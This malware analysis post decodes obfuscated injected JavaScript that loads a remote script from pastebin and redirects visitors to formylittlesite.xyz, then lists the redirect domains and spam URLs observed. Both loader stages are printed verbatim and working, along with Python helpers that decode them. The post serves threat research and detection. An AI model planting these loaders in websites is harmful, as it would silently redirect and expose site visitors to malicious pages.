Analysis of Obfuscated PHP Malware

#Threat Intelligence #Threat Hunting #PHP #Malware Analysis

Updated on February 27, 2019.

I am monitoring the PHP decoder site here and was alerted when the decoded PHP here had a String.fromCharCode command in it. After decoding the character code (104, 116, 116, 112, 115, 58, 47, 47, 103, 101, 116, 109, 121, 99, 111, 110, 102, 105, 103, 112, 108, 101, 97, 115, 101, 46, 99, 111, 109, 47, 103, 101, 116, 46, 112, 104, 112), this produced https://getmyconfigplease[.]com/get[.]php. The content of this site looks like:

var sECIQY8TzC = document.createElement('script'); sECIQY8TzC.type = 'text/javascript'; sECIQY8TzC.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 69, 110, 78, 75, 113, 71, 76, 78); document.head.appendChild(sECIQY8TzC);

Decoding the String.fromCharCode bit produces https://pastebin.com/raw/EnNKqGLN.

The content of this site is:

function _0x16ac9e(){var _0x11da69=['MHgy','MHgz','MHg0','MHg2','aHJlZg==','cmVwbGFjZQ==','bG9jYXRpb24=','aW5kZXhPZg==','Y29va2ll','QmVzdENvb2tpZT10cnVlOyBtYXgtYWdlPTIwNDAw','c2hpZnQ=','MHgw','MHgx'];(function(_0x538417,_0x48f8ea){var _0x350dbc=function(_0x2e576b){while(--_0x2e576b){_0x538417['push'](_0x538417['shift']());}};_0x350dbc(++_0x48f8ea);}(_0x11da69,0xd5));var _0x4097a7=function(_0x506a3d,_0x321114){_0x506a3d=_0x506a3d-0x0;var _0x32b6f7=_0x11da69[_0x506a3d];if(_0x4097a7['cNcBaR']===undefined){(function(){var _0x29eb7d;try{var _0x4e84d1=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x29eb7d=_0x4e84d1();}catch(_0x476c5c){_0x29eb7d=window;}var _0x3b1078='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x29eb7d['atob']||(_0x29eb7d['atob']=function(_0x2199f9){var _0x207876=String(_0x2199f9)['replace'](/=+$/,'');for(var _0x3d686c=0x0,_0x55acec,_0x22a388,_0x5795eb=0x0,_0x5c30ef='';_0x22a388=_0x207876['charAt'](_0x5795eb++);~_0x22a388&&(_0x55acec=_0x3d686c%0x4?_0x55acec*0x40+_0x22a388:_0x22a388,_0x3d686c++%0x4)?_0x5c30ef+=String['fromCharCode'](0xff&_0x55acec>>(-0x2*_0x3d686c&0x6)):0x0){_0x22a388=_0x3b1078['indexOf'](_0x22a388);}return _0x5c30ef;});}());_0x4097a7['qogRBP']=function(_0xd61dcf){var _0x10ae9e=atob(_0xd61dcf);var _0x3a9531=[];for(var _0x3a6320=0x0,_0x8d019b=_0x10ae9e['length'];_0x3a6320<_0x8d019b;_0x3a6320++){_0x3a9531+='%'+('00'+_0x10ae9e['charCodeAt'](_0x3a6320)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x3a9531);};_0x4097a7['KYlgqs']={};_0x4097a7['cNcBaR']=!![];}var _0x579681=_0x4097a7['KYlgqs'][_0x506a3d];if(_0x579681===undefined){_0x32b6f7=_0x4097a7['qogRBP'](_0x32b6f7);_0x4097a7['KYlgqs'][_0x506a3d]=_0x32b6f7;}else{_0x32b6f7=_0x579681;}return _0x32b6f7;};var _0x2be368=[_0x4097a7('0x0'),_0x4097a7('0x1'),'fromCharCode','BestCookie=true',_0x4097a7('0x2'),_0x4097a7('0x3'),_0x4097a7('0x4')];(function(_0x6e5b15,_0x2c75a3){var 
_0x42951f=function(_0x1975b5){while(--_0x1975b5){_0x6e5b15['push'](_0x6e5b15[_0x4097a7('0x5')]());}};_0x42951f(++_0x2c75a3);}(_0x2be368,0x1c9));var _0x4755cb=function(_0x5ad1ee,_0x39c6df){_0x5ad1ee=_0x5ad1ee-0x0;var _0x38bd4b=_0x2be368[_0x5ad1ee];return _0x38bd4b;};var _0x443bde=[_0x4755cb(_0x4097a7('0x6')),_0x4755cb(_0x4097a7('0x7')),_0x4755cb(_0x4097a7('0x8')),_0x4755cb(_0x4097a7('0x9')),_0x4755cb(_0x4097a7('0xa')),_0x4755cb('0x5'),_0x4755cb(_0x4097a7('0xb')),_0x4097a7('0xc')];var _0x4efd8b=String[_0x443bde[0x0]](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x66,0x6f,0x72,0x6d,0x79,0x6c,0x69,0x74,0x74,0x6c,0x65,0x73,0x69,0x74,0x65,0x2e,0x78,0x79,0x7a,0x2f,0x6c,0x69,0x74,0x74,0x6c,0x65,0x2e,0x70,0x68,0x70);if(document[_0x443bde[0x3]][_0x443bde[0x2]](_0x443bde[0x1])==-0x1){document[_0x443bde[0x3]]=_0x443bde[0x4];window[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);document[_0x443bde[0x6]][_0x443bde[0x5]](_0x4efd8b);window[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;document[_0x443bde[0x6]][_0x443bde[0x7]]=_0x4efd8b;}}_0x16ac9e();
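The script above hides every property name it touches behind a base64 string table that is first rotated by a seed and then read through the _0x4097a7 accessor (and a second, derived table read through _0x4755cb). The following is an added example, not code from the post: it replays that rotation in Python so the accessor indices can be resolved statically. The table contents and the seeds (0xd5 and 0x1c9) are copied from the script as quoted above; the readable rendering at the end is my own layout of the script's final if block, with each resolved name substituted in.

```python
import base64

# The base64 string table (_0x11da69) and the seed (0xd5) passed to its rotator,
# copied from the second-stage script quoted above. The second table (_0x2be368)
# and its seed (0x1c9) are likewise taken from that script.
STAGE2_TABLE = [
    "MHgy", "MHgz", "MHg0", "MHg2", "aHJlZg==", "cmVwbGFjZQ==", "bG9jYXRpb24=",
    "aW5kZXhPZg==", "Y29va2ll", "QmVzdENvb2tpZT10cnVlOyBtYXgtYWdlPTIwNDAw",
    "c2hpZnQ=", "MHgw", "MHgx",
]
STAGE2_SEED = 0xD5


def rotate_like_obfuscator(table, seed):
    """Replay the obfuscator's shuffle: f(++seed) with while(--n) push(shift()).

    ++seed followed by while(--n) runs the body exactly `seed` times, so the
    table ends up rotated left by seed % len(table) positions.
    """
    rotated = list(table)
    for _ in range(seed):
        rotated.append(rotated.pop(0))
    return rotated


def decode_stage2_table():
    """Strings that _0x4097a7('0x..') resolves to, indexed by that hex argument.

    The script's own decoder does atob() followed by a percent-decode, which for
    this all-ASCII table is the same as a plain base64 decode.
    """
    rotated = rotate_like_obfuscator(STAGE2_TABLE, STAGE2_SEED)
    return [base64.b64decode(s).decode("ascii") for s in rotated]


def resolve_stage2_names():
    """Resolve the _0x443bde accessor array to the property names it hides."""
    t1 = decode_stage2_table()

    def s1(idx):  # _0x4097a7('0x..'): JS coerces the hex string to a number
        return t1[int(idx, 16)]

    # _0x2be368 is built from first-table lookups plus two plain literals and
    # then shuffled by the same rotation routine with seed 0x1c9.
    t2 = rotate_like_obfuscator(
        [s1("0x0"), s1("0x1"), "fromCharCode", "BestCookie=true",
         s1("0x2"), s1("0x3"), s1("0x4")],
        0x1C9,
    )

    def s2(idx):  # _0x4755cb('0x..')
        return t2[int(idx, 16)]

    return [s2(s1("0x6")), s2(s1("0x7")), s2(s1("0x8")), s2(s1("0x9")),
            s2(s1("0xa")), s2("0x5"), s2(s1("0xb")), s1("0xc")]


def readable_stage2(url):
    """Render the script's final if block with every table lookup substituted.

    Mirrors the obfuscated statement one-to-one, with n = _0x443bde:
      document[n[3]][n[2]](n[1]) == -1   (cookie check)
      document[n[3]] = n[4]              (cookie set)
      window/document[n[6]][n[5]](u)     (location.replace)
      window/document[n[6]][n[7]] = u    (location.href)
    """
    n = resolve_stage2_names()
    return (
        f"if (document.{n[3]}.{n[2]}('{n[1]}') == -1) {{\n"
        f"  document.{n[3]} = '{n[4]}';\n"
        f"  window.{n[6]}.{n[5]}('{url}');\n"
        f"  document.{n[6]}.{n[5]}('{url}');\n"
        f"  window.{n[6]}.{n[7]} = '{url}';\n"
        f"  document.{n[6]}.{n[7]} = '{url}';\n"
        f"}}"
    )


if __name__ == "__main__":
    print(resolve_stage2_names())
    # Defanged copy of the URL decoded later in this post.
    print(readable_stage2("https://formylittlesite[.]xyz/little.php"))
```

The resolved names show that the redirect is gated on a cookie: the script only redirects when document.cookie does not already contain BestCookie=true, and it sets that cookie with max-age=20400 before redirecting, so a given browser is sent away at most once every 20400 seconds. That cookie name is a useful artifact to look for when checking whether a user has already been bounced through this chain.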

Update (February 27, 2019)

The content below was added on February 27, 2019.

Upon further investigation, the code above contains the interesting snippet:

(0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x66,0x6f,0x72,0x6d,0x79,0x6c,0x69,0x74,0x74,0x6c,0x65,0x73,0x69,0x74,0x65,0x2e,0x78,0x79,0x7a,0x2f,0x6c,0x69,0x74,0x74,0x6c,0x65,0x2e,0x70,0x68,0x70)

This is a list of hex-encoded character codes that decodes to:

https://formylittlesite.xyz/little.php
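Both loader stages in this post hide their next-hop URL as a list of character codes, once in decimal via String.fromCharCode and once in hex with the method name itself obfuscated away. The following is an added example, not code from the post: a small Python extractor that pulls such lists out of a script regardless of how the call is named, decodes them, and defangs the result for a report. The two sample strings are constructed from the calls quoted on this page.

```python
import re

# Constructed samples copied from the two loader stages quoted in this post:
# the first uses String.fromCharCode with decimal codes, the second hides the
# method name behind an obfuscated lookup and uses hex codes.
SAMPLE_STAGE1 = (
    "var sECIQY8TzC = document.createElement('script'); "
    "sECIQY8TzC.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, "
    "112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, "
    "47, 69, 110, 78, 75, 113, 71, 76, 78); document.head.appendChild(sECIQY8TzC);"
)
SAMPLE_STAGE2 = (
    "var _0x4efd8b=String[_0x443bde[0x0]](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,"
    "0x66,0x6f,0x72,0x6d,0x79,0x6c,0x69,0x74,0x74,0x6c,0x65,0x73,0x69,0x74,0x65,"
    "0x2e,0x78,0x79,0x7a,0x2f,0x6c,0x69,0x74,0x74,0x6c,0x65,0x2e,0x70,0x68,0x70);"
)

_NUM = r"(?:0[xX][0-9a-fA-F]+|\d+)"
# A parenthesised argument list made only of numeric literals (four or more).
# Matching on the argument list rather than on the name "fromCharCode" also
# catches calls whose method name has been obfuscated, as in stage 2.
_CODE_LIST = re.compile(r"\(\s*(" + _NUM + r"(?:\s*,\s*" + _NUM + r"){3,})\s*\)")


def _to_int(token):
    """Parse a JS numeric literal in decimal or 0x-prefixed hex form."""
    return int(token, 16) if token.lower().startswith("0x") else int(token)


def decode_char_codes(js):
    """Return every string hidden as a list of character codes in `js`.

    Lists containing non-printable code points are skipped; those are more
    likely ordinary numeric arrays than encoded text.
    """
    decoded = []
    for match in _CODE_LIST.finditer(js):
        codes = [_to_int(tok) for tok in re.split(r"\s*,\s*", match.group(1))]
        if all(0x20 <= c <= 0x7E for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def defang(url):
    """Defang a URL for safe inclusion in a report (hxxp and [.])."""
    return url.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    for label, sample in (("stage 1", SAMPLE_STAGE1), ("stage 2", SAMPLE_STAGE2)):
        for s in decode_char_codes(sample):
            print(f"{label}: {defang(s)}")
```

Running it on the two samples yields the pastebin raw URL from stage 1 and the formylittlesite.xyz URL from stage 2, which is exactly the manual decoding walked through above; the same function applied to a whole captured script gives a quick first pass over any other code lists it carries.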

Visitors to this site will be redirected to a URL on one of the following domains (the full URLs are listed below):

appelertte.tk
atlanta-rostov.ru
avtonewsmir.ru
avtoservis5plus.ru
avtowoldsnews.ru
creditforms.site
edu-fddu.info
giner.online
greencool.icu
informzine.site
lentube.host
merkuriu.icu
picturesun.top
rriverrponse.tk
sarriverdoma.tk
school-fix-news.info
storics.info
studentachieve.tk
visnu.icu
www.twero.com

Here are the URLs to which I was redirected:

http://appelertte.tk/index/?8mMwj2&extra_param_1=261
http://appelertte.tk/index/?8mMwj2&extra_param_1=695
http://atlanta-rostov.ru/2018/12/26/ken-shamrock-vs-kimbo-slice-full-fight/
http://atlanta-rostov.ru/2018/12/27/rhythmbox-vs-banshee/
http://atlanta-rostov.ru/latest.php
http://avtonewsmir.ru/the-best-stock-photos/
http://avtoservis5plus.ru/main-credit-reporting-agencies/
http://avtowoldsnews.ru/forex-trading-for-dummies-2013-pdf/
http://avtowoldsnews.ru/latest.php
http://creditforms.site/average-car-insurance-rates-florida/
http://creditforms.site/latest.php
http://creditforms.site/the-carburetors/
http://edu-fddu.info/blog/latest.php
http://giner.online/can-you-apply-for-more-than-one-credit-card/
http://greencool.icu/blog/?p=502
http://greencool.icu/blog/latest.php
http://informzine.site/2018/12/26/papigfunk/
http://informzine.site/latest.php
http://lentube.host/forex-trading-tutorials/
http://lentube.host/latest.php
http://lentube.host/top-forex-traders-in-the-world-2017/
http://lentube.host/what-is-a-broker-forex-nu3p/
http://merkuriu.icu/blog/?p=446
http://picturesun.top/blog/?p=102
http://picturesun.top/blog/?p=104
http://picturesun.top/blog/?p=125
http://picturesun.top/blog/?p=13
http://picturesun.top/blog/?p=1348
http://picturesun.top/blog/?p=1357
http://picturesun.top/blog/?p=1382
http://picturesun.top/blog/?p=1416
http://picturesun.top/blog/?p=1444
http://picturesun.top/blog/?p=1485
http://picturesun.top/blog/?p=149
http://picturesun.top/blog/?p=1494
http://picturesun.top/blog/?p=1499
http://picturesun.top/blog/?p=1509
http://picturesun.top/blog/?p=1537
http://picturesun.top/blog/?p=1553
http://picturesun.top/blog/?p=156
http://picturesun.top/blog/?p=1566
http://picturesun.top/blog/?p=158
http://picturesun.top/blog/?p=1589
http://picturesun.top/blog/?p=1600
http://picturesun.top/blog/?p=1611
http://picturesun.top/blog/?p=1631
http://picturesun.top/blog/?p=1651
http://picturesun.top/blog/?p=1655
http://picturesun.top/blog/?p=1658
http://picturesun.top/blog/?p=1667
http://picturesun.top/blog/?p=1675
http://picturesun.top/blog/?p=1690
http://picturesun.top/blog/?p=1694
http://picturesun.top/blog/?p=174
http://picturesun.top/blog/?p=178
http://picturesun.top/blog/?p=18
http://picturesun.top/blog/?p=183
http://picturesun.top/blog/?p=209
http://picturesun.top/blog/?p=213
http://picturesun.top/blog/?p=226
http://picturesun.top/blog/?p=242
http://picturesun.top/blog/?p=252
http://picturesun.top/blog/?p=256
http://picturesun.top/blog/?p=268
http://picturesun.top/blog/?p=274
http://picturesun.top/blog/?p=280
http://picturesun.top/blog/?p=306
http://picturesun.top/blog/?p=312
http://picturesun.top/blog/?p=314
http://picturesun.top/blog/?p=334
http://picturesun.top/blog/?p=348
http://picturesun.top/blog/?p=354
http://picturesun.top/blog/?p=374
http://picturesun.top/blog/?p=376
http://picturesun.top/blog/?p=380
http://picturesun.top/blog/?p=382
http://picturesun.top/blog/?p=396
http://picturesun.top/blog/?p=404
http://picturesun.top/blog/?p=418
http://picturesun.top/blog/?p=426
http://picturesun.top/blog/?p=430
http://picturesun.top/blog/?p=448
http://picturesun.top/blog/?p=452
http://picturesun.top/blog/?p=458
http://picturesun.top/blog/?p=470
http://picturesun.top/blog/?p=476
http://picturesun.top/blog/?p=480
http://picturesun.top/blog/?p=484
http://picturesun.top/blog/?p=500
http://picturesun.top/blog/?p=513
http://picturesun.top/blog/?p=517
http://picturesun.top/blog/?p=523
http://picturesun.top/blog/?p=527
http://picturesun.top/blog/?p=529
http://picturesun.top/blog/?p=531
http://picturesun.top/blog/?p=537
http://picturesun.top/blog/?p=541
http://picturesun.top/blog/?p=543
http://picturesun.top/blog/?p=545
http://picturesun.top/blog/?p=551
http://picturesun.top/blog/?p=557
http://picturesun.top/blog/?p=565
http://picturesun.top/blog/?p=567
http://picturesun.top/blog/?p=569
http://picturesun.top/blog/?p=573
http://picturesun.top/blog/?p=575
http://picturesun.top/blog/?p=622
http://picturesun.top/blog/?p=86
http://picturesun.top/blog/?p=92
http://picturesun.top/blog/?p=96
http://picturesun.top/blog/latest.php
http://rriverrponse.tk/index/?8mMwj2&extra_param_1=695
http://sarriverdoma.tk/index/?8mMwj2&extra_param_1=695
http://school-fix-news.info/2019/01/09/car-accident-my-fault-will-my-insurance-go-up/
http://storics.info/2018/12/27/business-credit-cards-for-bad-credit/
http://storics.info/2018/12/27/cheapest-home-equity-line-of-credit/
http://storics.info/2018/12/27/paid-in-full-on-credit-report/
http://storics.info/2018/12/27/wipe-credit-clean/
http://storics.info/latest.php
http://visnu.icu/philadelphia-indemnity-car-insurance/
https://www.twero.com/en/profiles?p=1027797&pi=test1&_=1548965393

I intend to do more investigation of the registrant information for these domains at some point and will keep you posted!